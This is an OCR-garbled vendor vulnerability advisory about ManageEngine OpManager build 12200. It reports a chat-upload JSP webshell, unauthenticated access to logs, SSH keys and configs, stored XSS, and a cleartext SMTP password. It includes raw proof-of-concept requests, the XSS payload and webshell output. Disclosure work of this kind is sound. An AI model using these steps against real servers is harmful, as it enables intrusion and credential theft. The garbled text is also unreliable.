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Manage Engine OpManager Multiple Security Vulnerabilities 


SYSTEMS AFFECTED: 
Build version 12200 


Reference: https://www.manageengine.com/ 


Qualys Application Security and Research (QUASAR) team engages in a routine security assessment 
of various products. In a recent engagement of a security assessment of ManageEngine OPManager 
(Build version 12200), my team discovered multiple vulnerabilities affecting the product, which were 
reported to ManageEngine and were confirmed to be patched in the latest version. 


Below is the detailed outline of the vulnerabilities that were discovered. 
Vulnerability #1: Unrestricted Files/Web shell Upload. 


OPManager group chat functionality, as seen in below snapshots allows users to upload files to the 
chat. The file upload functionality does not enforce any restriction on file types that are uploaded, 
thereby allowing users to upload web shells. Since the application executes with System privilege on a 
Windows box and with ROOT on a Linux machine, any code execution performed, is with the highest 
privilege. There by making this a critical vulnerability. The details for the exploitation are outlined as 
below. 


URL: http://<ip>/apiclient/ember/index.jsp#/ITPlus 


Risk factor: Critical 
Proof of Concept: 


1. Login into the application. Directly go to the following URL 
http://<ip>/apiclient/ember/index.jsp#/ITPlus or click on the chat icon from the dashboard. 


OpManager eeceecesece 


^ 


Group Chat 


Attach Files 


Group Chat 


My Groups 


test 
test\u003e 


test> 


2. Attach any jsp file or jsp web shell using the “attach files” functionality. 


POST /api/json/dashboard/addPost? apikey=5flcede3hSle fe fhedécl77$1c9355cSegroupID=0 HTTP/1.1 
ost: localhost: 88 
iser-Agent: Mozilla/5.0 (Windows NT 6.1; WO0WE4; rv:50.0) Gecko/20100101 Firefox/50.0 
ccept: */* 
ccept-Language: en-GB,en;q=0.5 
ccept-Encoding: gzip, deflate 
(-Requested-With: XMLHttpRequest 
: http: //localhost:88/apiclient/ember/index. jsp 
ontent-Length: 349 
ontent-Type: multipart/form-data; boundary= 58093196614932 
ookie: domainNameForAutomaticSignin=Authenticator; authrule_name=Authenticator; encryptPassForAutomaticSignin=d7963B4t; userNameForAutomaticSignin=admin; signInAutomatically=true; 
FA SSO-SCEEFA02385CC3149D811743468923B8 
onnection: close 


58093196614932 
ontent-Disposition: form-data; name="post" 


Jsp file is being uploaded 


58093196614932 
ontent-Disposition: form-data; name=" [object HTMLInputElement]i";ffilename sp" 
ontent-Type: application/octet-stream 


Ki-- 


jsp File browser 1.2 

Copyright (C) 2003-2006 Boris von Loesch 

This program is free software; you can redistribute it and/or modify it under 

the terms of the GNU General Public License as published by the 

Free Software Foundation; either version 2 of the License, or (at your option) 

any later version. 

This program is distributed in the hope that it will be useful, but 

WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or JSP Shell code 
FITNESS FOR À PARTICULAR PURPOSE. See the GNU General Public License for more details. 
You should have received a copy of the GNU General Public License along vith 

this program; if not, write to the 

Free Software Foundation, Inc., 

59 Temple Place, Suite 330, 


3. The given file gets uploaded. 


localhost:88/apiclient/ember/index,jsp#/ITPlu &B-BOOSS_CUBO2 c * Searc wie Ot ff 5-859 


OpManager ecececece Q a 
Group 
Whats up 
U: 2 
admin eee [2] 
Attach Files Share A 
Group Chat 
GQ TOP PARTICIPANTS(LAST 30 DAYS) 
- test 
My Groups a [o7 A 
E ! admin (1) 
1 Webshell gets uploaded 

test 

test\u003e 2016-12-16 12:12:20 

test> ACTIVITY GRAPH(LAST 30 DAYS) 

test» 

test» 
Removed Groups v 05 
Help Desk Settings 

o | 


State Bank of India - Internet Explorer 3 x 


4. On successful upload, the file can be accessed by simply clicking on it. If any jsp webshell is 
uploaded, the file gets executed with admin access. 


Executing: dir 


a.log 
hiberfilsys 


pagefile sys 


Executing: cmd.exe 


Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved 


C > 


Vulnerability #2: Unauthenticated File Access. 


OPManager application doesn't imply any permission on various sensitive directories and files, which 
allows any, un-authenticated user to access sensitive logs, configuration files, private keys, etc. The files 
contain sensitive information which can allow an attacker to gain admin access to the OPManager. 


Risk factor: Critical 


Proof of concept: 


1. From any browser, access <ip>/logs/access_log.txt. This file reveals all the access details. This 
includes the most important api-key. Using the api-key, the user can fetch critical information. 


€ i) 10.113.195.174/logs/access log.txt C ix Search +a Uw wv Bg ae @ €- 


10.113.14.200 - admin [12/Sep/2016:06:36:04 +0530] "GET /api/json/admin/getSystemPerformanceStatus?apiKey-a4eaddfaa32574f162de0118c0652a4b& -147368| 
200 257 

10.113.14.200 - admin [12/Sep/2016:06:36:06 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/jquery-ui/images/ui-bg flat 100 ffffff 40x100.png 
10.113.14.200 - admin [12/Sep/2016:06:36:06 40530] "GET /apiclient/fluidicv2/styles/css/plugins/jquery-ui/images/ui-icons 222222 256x240.png HTTP/ 
10.113.14.200 - admin [12/Sep/2016:06:36:06 +0530] "GET /PNSHandler HITP/1.1" 101 - 

10.113.14.200 - admin [12/Sep/2016:06:38:28 +0530] "GET /logs/access_log.txt HTTP/1. 45 

10.113.14.200 - admin [12/Sep/2016:06:39:05 +0530] "POST /api/json/admin/SubmitQuery| apiKey-tt dd TER 574f162d E HTTP/1.1" 200 134 
10.113.14.200 - admin [12/Sep/2016:06:39:05 +0530] "POST /api/json/admin/SubmitQuery| apiKey-a4eaddfaa32574f162de0118c0652adb ITTP/1.1" 200 134 
10.113.14.200 - admin [12/Sep/2016:06:39:05 40530] "POST /api/json/admin/SubmitQueryfapiKey-a4eaddfaa32574f162de0118c0652a4b FATTP/1.1" 200 134 
10.113.14.200 - admin [12/5ep/2016:06:39:05 +0530] "POST /api/json/admin/SubmitQueryfapikey=a4eaddfaa32574£162de0118c0652a4b EITTP/1.1" 200 134 
10.113.14.200 - admin [12/Sep/2016:06:39:05 +0530] "POST /api/json/admin/SubmitQuery|apiKey-a4eaddfaa32574f162de0118c0652a4b TP/1.1" 200 134 
10.113.14.200 - admin [12/5ep/2016:06:39:06 +0530] "POST /api/json/admin/SubmitQuery iss sp IEEE TTP/1.1" 200 134 
10.113.14.200 - admin [12/5ep/2016:06:39:06 40530] "POST /api/json/admin/SubmitQueryfiapix addía d g à ITTP/1.1" 200 134 


Unauthenticated access to access log.txt file. This file reveals api-key which is highlighted in the 


above image. 
2. Unauthenticated access to private keys. This can be accessed from 
http://«ip»/bin/.ssh host dsa key and http://«ip-/bin/.ssh host rsa key. 


10.113.195.174/bin/.ssh host rsa key ET. D e Q Sel 


MIICXAIBAAKBgQCKppRCurLGOodz6JjSGawhttUEi4297iDtB8wdIW2RYiSOEMbqROhu-YwX7RGN 
4cLWpEZyYG3OD4N6u3-4gEuJTrDKgY7AkiDmB2ECQl/pJOW2aNzNjlgLb-4bzMzB39siFUrx7nogRO 
ycTEc2tq3DvITe5tyjGB8SftYO5K9WqtFwIDAQABAOGAGA47UdRbqpZ/1gG9AwLG91s3iNQ8POypb 
fQFJvpiAUJ81U1pqTvH35OdswuypyouOOF7CacVkzco2qpRN36EnPri1X005xoj/x0450Q7IfHCN1l 


DLGVOeyLLzGrWchAtKqByM6UB-EOvX7UCy/KPQyfGSR6vfUeqsOdtvyxtNR5nMECQODAn4UMRFE-4-— 
XxXZOO51G25Vn5QTkYHbOL9MFJjTGf4UUWl6U-tD-47zi1hnIGw9gg7FI-mx9N70T/93MDA4O0bECSNQUR 
AkEAuEUCLO2eAAwiQUbDkjLNyoSHJbeZihcmWGegOwrS4SPRUFOTAYJRsizzJCv7obeMPiGsMbhs 
S55dgizitYJvpwJBALQC39XM4CVSg2Hve199QUY849xbvlYOD4ZrGxss7OHmKhllXcJoTTplf4NU 
zxNCZKzIsDzGeOK7aWfBcr6wKeECQFNSgPTWXOZsmQC2jVoqhq-4*lc-XuParZkGs2nevDQUKGNOILy 
uwLOBzIRx8C15Pdq8LIeE6UbiIXipVJFdlbdWLUCQCzJlnZPg70p7KrOKHdCsBgg4147P/v7MkZi 
OH2PEYRjS1yjA51L-4vSXoIz8NwyJ/1/8G4-54UWwpFHHwUTLLGNC- 


3. Also, many configuration xml files are accessible without authentication. The above image shows 
server configuration located at http://<ip>/server_xml_bkp/server.xml. 


€ localhost88/server xml bkp/serve 


--> 
«!-- Tomcat Root Context --> 


«Context debug="0" docBase="$ (server home)" path="" reloadable="true" sessionCookiePath="/"> </Context> 
— «Context debug="0" docBase="$ {server home}/SPMHistory" path="/SPMHistory"> 
— «Manager className=" org.apache.catalina session PersistentManager" debug="0" maxActiveSessions="-1" maxIdleBackup="-1" maxIdleSwap="-1" minIdleSwap="-1" 
saveOnRestart=" false"> 
<Store className="org.apache.catalina.session FileStore"/> 
</Manager> 
</Context> 
— «Context debug="0" docBase="$ {server home}/IPAMPublish" path="/IPAMPublish"> 
— «Manager className=" org apache.catalina.session PersistentManager" debug="0" maxActiveSessions="-1" maxIdleBackup="-1" maxIdleSwap="-1" minIdleSwap="-1" 
saveOnRestart=" false"> 
<Store className="org.apache.catalina.session FileStore"/> 
</Manager> 
</Context> 
— «Context debug="0" docBase="$ {server home}/ScheduledReport" path="/ScheduledReport"> 
— «Manager className=" org apache.catalina session PersistentManager" debug="0" maxActiveSessions="-1" maxIdleBackup="-1" maxIdleSwap="-1" minIdleSwap="-1" 
saveOnRestart=" false"> 
<Store className="org.apache.catalina.session.FileStore"/> 
</Manager> 
</Context> 
— «Context debug="0" docBase="$ {server home}/conf/LoggedOnUser" path="/LoggedOnUser"> 
— «Manager className=" org.apache.catalina.session.PersistentManager" debug="0" maxActiveSessions="-1" maxIdleBackup="-1" maxIdleSwap="-1" minIdleSwap="-1" 
saveOnRestart=" false"> 
<Store className="org.apache.catalina.session FileStore"/> 


</Manager> 


As shown in the first step, the user can get the api-key from the access_log file. Using that api-key, 
user can directly fetch information. Even if the user logs out, the api-key remains active and 
information can be fetched. Please refer to the below image. 


10.113.195.174/ax 


“:"1","requiresauth”: "true", "mailusername": “test”, "mailserverport":"25", "securemode" : "false", "t1sMode": "false", "mailservername”:"10.10.10.10", "timeout": "3", "mai 
,"fromemailid":"testgtest.com", "emailid”:"test@test.com"}} — 


The user can fetch information regarding the SMTP server which includes sensitive information 
like IP. Password etc. This vulnerability affects all the calls. 


Vulnerability #3: Stored XSS. 


OPManager lacks in performing html encoding of data in access_logs, which allows an attacker to add arbitrary 
payloads in HTTP GET request, which is displayed back to the admin user, via access_log records. Exploiting 
this vulnerability will allow an attacker to conduct XSS attack on the victim. 


Risk factor: High 
Proof of concept: 


1. Try to access any URL like http:<ip>/<xss payload>. 


GET /<img src-z onerror=alert(l)> HTTP/1.1 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 
Accept: text/html,application/xhtmltxml,application/xml;q-0.9,*/*;q-0.8 
Accept-Language: en-GB,en;q-0.5 

Accept-Encoding: gzip, deflate 

Cookie: domainNameForAutomaticSignin=Authenticator; authrule_name=Authenticator; 


JSESSIONID=SLO3SEF7EBABID421FDS345S7B33EE84; f-2RedirectUrl-null; encryptPassForAutomaticSignin=d7963B4t; 
userNameForAutomaticSignin=admin; signInAutomatically=true; NFA  SSO-FDOÜEI4EDGECDE6805544B4799ACEDBA3D 
Connection: close 

Upgrade-Insecure-Requests: 1 


2. Now go to the logs page http://<ip>/apiclient/ember/index.jsp#/ViewLogs/access_log.txt. The script 
executes here. 


€ Q) | 10113.195.174/apiclient/ember/indexjsp&/ViewLogs/access log.txt vE]| x E * | Q, Search 4 ft Ga * 8 [v] 4 o6 i 


f2RedirectUri=null; encryptPassForAutomaticSigninzd7963B4t; userNameForAutomaticSignin=admin; 
domainNameForAutomaticSignin=Authenticator, signInAutomatically-true; authrule_name=Authenticator 


access log.txt 


10.113.14.200 - - [12/Sep/2016:06:35:49 +0530] "GET [8] HTTP/1.1" 505 - 

10.113.14.200 - admin [12/Sep/2016:06:35:53 +0530] "GET /apiclient/ember/index.jsp HTTP/1.1" 200 13387 

10.113.14.200 - admin [12/Sep/2016:06:35:54 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/screenshot/ui.components.icon.css 
10.113.14.200 - admin [12/Sep/2016:06:35:54 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/screenshot/ui.zscreengrabber.css 
10.113.14.200 - admin [12/Sep/2016:06:35:54 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/ui.jqgrid.css HTTP/1.1" 304 - 
10.113.14.200 - admin [12/Sep/2016:06:35:54 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/screenshot/ui.font.css HTTP/1.1" 3 
10.113.14.200 - admin [12/Sep/2016:06:35:54 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/jquery-ui/jquery-ui-1.10.1.custom.q 
10.113.14.200 - admin [12/Sep/2016:06:35:54 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/normalize.css HTTP/1.1" 304 - 
10.113.14.200 - admin [12/Sep/2016:06:35:54 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/reset.css HTTP/1.1" 304 - 
10.113.14.200 - admin [12/Sep/2016:06:35:54 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/jquery.mCustomScrollbar.css HTTP 
10.113.14.200 - admin [12/Sep/2016:06:35:54 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/style.css HTTP/1.1" 304 - 
10.113.14.200 - admin [12/Sep/2016:06:35:54 +0530] "GET /apiclient/fluidicv2/styles/css/structure.min.css HTTP/1.1" 304 - 


2. Console @ Debugger {} Style Editor © Performance = Network 


#PageContent div.opmContent div.opmFormHolder div.opmFormRow div@viewLog D pre&loadFile.apiClientDefa 


"«div id-"viewLog" style="width: 1256px;"» 
«div id-"logName" class-"title"»access log.txt«/div» 
<br></br> 
w<div style="width: 160%; "> 

" «pre id-"loadFile" class-"apiClientDefaultFont"» 
10.1 14.200 12 2016:06 49 «05: 3E 
«img src-"Rt" onerror "»«/img» € 
HTTP/1.1" 505 - 10.113.14.200 - admin [12/Sep/261... 


Vulnerability #4: Password received in clear text in response. 


OPManager application had the feature of configuring the mail services wherein a user must enter the details of 
the SMTP server. It was noticed that the password was received in a clear text in the response. Ideally password 
should not be sent in clear text in response. It should not be sent or must be masked. 


RISK FACTOR: Low 


Reproduction Steps: 


1. For the following request http://<ip>/api/json/admin/GetMailServerSettings?apiKey=<api-key>, 
the password for the SMTP mail server is received in a clear text. 


€ Q | D 10.113.195.174/api/json/ad tMailServerSettings?a 566cadd0ef640f05d45ac0698ed5a1 g 


{"primary": 
{"settingsId":"1", “requiresauth": "true", "mailusername": "test" ,"mailserverport" : "25" ,"securemode" : "false" ," t1 sMode" : "false", "mailservername" :"10. 10. 10.10" , "timeout": "3" ,"mailpassword":"test 
pasword" ,"fromemailid":"test(test com" , "emailid":"test(itest com") ) 


ManageEngine accepted the reported issues and was quick to patch the reported vulnerabilities. The vendor has 
already pushed a security update to patch the issues. In order to confirm if you are using the latest patched 
version of ManageEngine, kindly contact the ManageEngine Support 
(https://www.manageengine.com/support.html). 


